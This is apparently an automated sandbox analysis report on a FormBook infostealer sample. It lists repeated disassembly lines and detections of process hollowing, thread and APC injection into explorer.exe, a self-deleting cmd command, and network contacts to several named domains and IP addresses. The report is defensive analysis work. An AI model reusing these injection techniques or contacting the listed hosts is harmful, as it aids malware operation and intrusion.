          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]2_2_00BD3D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCAD30 mov eax, dword ptr fs:[00000030h]2_2_00BCAD30
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC577 mov eax, dword ptr fs:[00000030h]2_2_00BEC577
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEC577 mov eax, dword ptr fs:[00000030h]2_2_00BEC577
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE7D50 mov eax, dword ptr fs:[00000030h]2_2_00BE7D50
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8E539 mov eax, dword ptr fs:[00000030h]2_2_00C8E539
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C4A537 mov eax, dword ptr fs:[00000030h]2_2_00C4A537
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98D34 mov eax, dword ptr fs:[00000030h]2_2_00C98D34
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FEC0 mov eax, dword ptr fs:[00000030h]2_2_00C7FEC0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C08EC7 mov eax, dword ptr fs:[00000030h]2_2_00C08EC7
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98ED6 mov eax, dword ptr fs:[00000030h]2_2_00C98ED6
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FE87 mov eax, dword ptr fs:[00000030h]2_2_00C5FE87
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF16E0 mov ecx, dword ptr fs:[00000030h]2_2_00BF16E0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD76E2 mov eax, dword ptr fs:[00000030h]2_2_00BD76E2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C446A7 mov eax, dword ptr fs:[00000030h]2_2_00C446A7
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]2_2_00C90EA5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]2_2_00C90EA5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C90EA5 mov eax, dword ptr fs:[00000030h]2_2_00C90EA5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF36CC mov eax, dword ptr fs:[00000030h]2_2_00BF36CC
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AE44 mov eax, dword ptr fs:[00000030h]2_2_00C8AE44
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8AE44 mov eax, dword ptr fs:[00000030h]2_2_00C8AE44
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCE620 mov eax, dword ptr fs:[00000030h]2_2_00BCE620
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA61C mov eax, dword ptr fs:[00000030h]2_2_00BFA61C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA61C mov eax, dword ptr fs:[00000030h]2_2_00BFA61C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]2_2_00BCC600
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]2_2_00BCC600
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCC600 mov eax, dword ptr fs:[00000030h]2_2_00BCC600
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF8E00 mov eax, dword ptr fs:[00000030h]2_2_00BF8E00
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81608 mov eax, dword ptr fs:[00000030h]2_2_00C81608
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]2_2_00BEAE73
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]2_2_00BEAE73
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]2_2_00BEAE73
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]2_2_00BEAE73
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAE73 mov eax, dword ptr fs:[00000030h]2_2_00BEAE73
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD766D mov eax, dword ptr fs:[00000030h]2_2_00BD766D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FE3F mov eax, dword ptr fs:[00000030h]2_2_00C7FE3F
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]2_2_00BD7E41
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]2_2_00BD7E41
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]2_2_00BD7E41
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]2_2_00BD7E41
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]2_2_00BD7E41
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD7E41 mov eax, dword ptr fs:[00000030h]2_2_00BD7E41
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD8794 mov eax, dword ptr fs:[00000030h]2_2_00BD8794
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C037F5 mov eax, dword ptr fs:[00000030h]2_2_00C037F5
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]2_2_00C47794
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]2_2_00C47794
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C47794 mov eax, dword ptr fs:[00000030h]2_2_00C47794
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB73D mov eax, dword ptr fs:[00000030h]2_2_00BEB73D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEB73D mov eax, dword ptr fs:[00000030h]2_2_00BEB73D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFE730 mov eax, dword ptr fs:[00000030h]2_2_00BFE730
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC4F2E mov eax, dword ptr fs:[00000030h]2_2_00BC4F2E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC4F2E mov eax, dword ptr fs:[00000030h]2_2_00BC4F2E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C98F6A mov eax, dword ptr fs:[00000030h]2_2_00C98F6A
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEF716 mov eax, dword ptr fs:[00000030h]2_2_00BEF716
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA70E mov eax, dword ptr fs:[00000030h]2_2_00BFA70E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA70E mov eax, dword ptr fs:[00000030h]2_2_00BFA70E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9070D mov eax, dword ptr fs:[00000030h]2_2_00C9070D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9070D mov eax, dword ptr fs:[00000030h]2_2_00C9070D
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FF10 mov eax, dword ptr fs:[00000030h]2_2_00C5FF10
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5FF10 mov eax, dword ptr fs:[00000030h]2_2_00C5FF10
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDFF60 mov eax, dword ptr fs:[00000030h]2_2_00BDFF60
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDEF40 mov eax, dword ptr fs:[00000030h]2_2_00BDEF40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362DB60 mov ecx, dword ptr fs:[00000030h]5_2_0362DB60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03653B7A mov eax, dword ptr fs:[00000030h]5_2_03653B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03653B7A mov eax, dword ptr fs:[00000030h]5_2_03653B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362DB40 mov eax, dword ptr fs:[00000030h]5_2_0362DB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F8B58 mov eax, dword ptr fs:[00000030h]5_2_036F8B58
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362F358 mov eax, dword ptr fs:[00000030h]5_2_0362F358
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E131B mov eax, dword ptr fs:[00000030h]5_2_036E131B
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]5_2_036503E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]5_2_036503E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]5_2_036503E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]5_2_036503E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]5_2_036503E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036503E2 mov eax, dword ptr fs:[00000030h]5_2_036503E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364DBE9 mov eax, dword ptr fs:[00000030h]5_2_0364DBE9
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A53CA mov eax, dword ptr fs:[00000030h]5_2_036A53CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A53CA mov eax, dword ptr fs:[00000030h]5_2_036A53CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]5_2_03654BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]5_2_03654BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03654BAD mov eax, dword ptr fs:[00000030h]5_2_03654BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F5BA5 mov eax, dword ptr fs:[00000030h]5_2_036F5BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E138A mov eax, dword ptr fs:[00000030h]5_2_036E138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03631B8F mov eax, dword ptr fs:[00000030h]5_2_03631B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03631B8F mov eax, dword ptr fs:[00000030h]5_2_03631B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DD380 mov ecx, dword ptr fs:[00000030h]5_2_036DD380
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652397 mov eax, dword ptr fs:[00000030h]5_2_03652397
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365B390 mov eax, dword ptr fs:[00000030h]5_2_0365B390
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DB260 mov eax, dword ptr fs:[00000030h]5_2_036DB260
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DB260 mov eax, dword ptr fs:[00000030h]5_2_036DB260
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F8A62 mov eax, dword ptr fs:[00000030h]5_2_036F8A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366927A mov eax, dword ptr fs:[00000030h]5_2_0366927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]5_2_03629240
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]5_2_03629240
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]5_2_03629240
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629240 mov eax, dword ptr fs:[00000030h]5_2_03629240
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EEA55 mov eax, dword ptr fs:[00000030h]5_2_036EEA55
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036B4257 mov eax, dword ptr fs:[00000030h]5_2_036B4257
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03664A2C mov eax, dword ptr fs:[00000030h]5_2_03664A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03664A2C mov eax, dword ptr fs:[00000030h]5_2_03664A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A229 mov eax, dword ptr fs:[00000030h]5_2_0364A229
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03638A0A mov eax, dword ptr fs:[00000030h]5_2_03638A0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]5_2_03625210
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov ecx, dword ptr fs:[00000030h]5_2_03625210
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]5_2_03625210
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03625210 mov eax, dword ptr fs:[00000030h]5_2_03625210
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362AA16 mov eax, dword ptr fs:[00000030h]5_2_0362AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362AA16 mov eax, dword ptr fs:[00000030h]5_2_0362AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03643A1C mov eax, dword ptr fs:[00000030h]5_2_03643A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EAA16 mov eax, dword ptr fs:[00000030h]5_2_036EAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EAA16 mov eax, dword ptr fs:[00000030h]5_2_036EAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652AE4 mov eax, dword ptr fs:[00000030h]5_2_03652AE4
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652ACB mov eax, dword ptr fs:[00000030h]5_2_03652ACB
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]5_2_036252A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]5_2_036252A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]5_2_036252A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]5_2_036252A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036252A5 mov eax, dword ptr fs:[00000030h]5_2_036252A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363AAB0 mov eax, dword ptr fs:[00000030h]5_2_0363AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363AAB0 mov eax, dword ptr fs:[00000030h]5_2_0363AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365FAB0 mov eax, dword ptr fs:[00000030h]5_2_0365FAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365D294 mov eax, dword ptr fs:[00000030h]5_2_0365D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365D294 mov eax, dword ptr fs:[00000030h]5_2_0365D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362C962 mov eax, dword ptr fs:[00000030h]5_2_0362C962
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B171 mov eax, dword ptr fs:[00000030h]5_2_0362B171
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B171 mov eax, dword ptr fs:[00000030h]5_2_0362B171
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364B944 mov eax, dword ptr fs:[00000030h]5_2_0364B944
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364B944 mov eax, dword ptr fs:[00000030h]5_2_0364B944
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]5_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]5_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]5_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov eax, dword ptr fs:[00000030h]5_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120 mov ecx, dword ptr fs:[00000030h]5_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365513A mov eax, dword ptr fs:[00000030h]5_2_0365513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365513A mov eax, dword ptr fs:[00000030h]5_2_0365513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]5_2_03629100
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]5_2_03629100
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03629100 mov eax, dword ptr fs:[00000030h]5_2_03629100
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036B41E8 mov eax, dword ptr fs:[00000030h]5_2_036B41E8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]5_2_0362B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]5_2_0362B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362B1E1 mov eax, dword ptr fs:[00000030h]5_2_0362B1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036561A0 mov eax, dword ptr fs:[00000030h]5_2_036561A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036561A0 mov eax, dword ptr fs:[00000030h]5_2_036561A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]5_2_036E49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]5_2_036E49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]5_2_036E49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E49A4 mov eax, dword ptr fs:[00000030h]5_2_036E49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A69A6 mov eax, dword ptr fs:[00000030h]5_2_036A69A6
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]5_2_036A51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]5_2_036A51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]5_2_036A51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036A51BE mov eax, dword ptr fs:[00000030h]5_2_036A51BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov ecx, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF mov eax, dword ptr fs:[00000030h]5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365A185 mov eax, dword ptr fs:[00000030h]5_2_0365A185
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364C182 mov eax, dword ptr fs:[00000030h]5_2_0364C182
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652990 mov eax, dword ptr fs:[00000030h]5_2_03652990
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1074 mov eax, dword ptr fs:[00000030h]5_2_036F1074
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E2073 mov eax, dword ptr fs:[00000030h]5_2_036E2073
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03640050 mov eax, dword ptr fs:[00000030h]5_2_03640050
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03640050 mov eax, dword ptr fs:[00000030h]5_2_03640050
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]5_2_0365002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]5_2_0365002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]5_2_0365002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]5_2_0365002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365002D mov eax, dword ptr fs:[00000030h]5_2_0365002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]5_2_0363B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]5_2_0363B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]5_2_0363B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B02A mov eax, dword ptr fs:[00000030h]5_2_0363B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A830 mov eax, dword ptr fs:[00000030h]5_2_0364A830
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.vacalinda.com
          Source: C:\Windows\explorer.exeDomain query: www.servicesbackyard.com
          Source: C:\Windows\explorer.exeDomain query: www.caravansforsalenorthwales.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.180.243 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.djspencer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 168.235.88.209 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 159.89.244.183 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Users\user\Desktop\SX365783909782021.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\SX365783909782021.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: BB0000Jump to behavior
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SX365783909782021.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.214211632.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.214392871.0000000001980000.00000002.00000001.sdmp, help.exe, 00000005.00000002.476078258.0000000004A90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B88

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORY
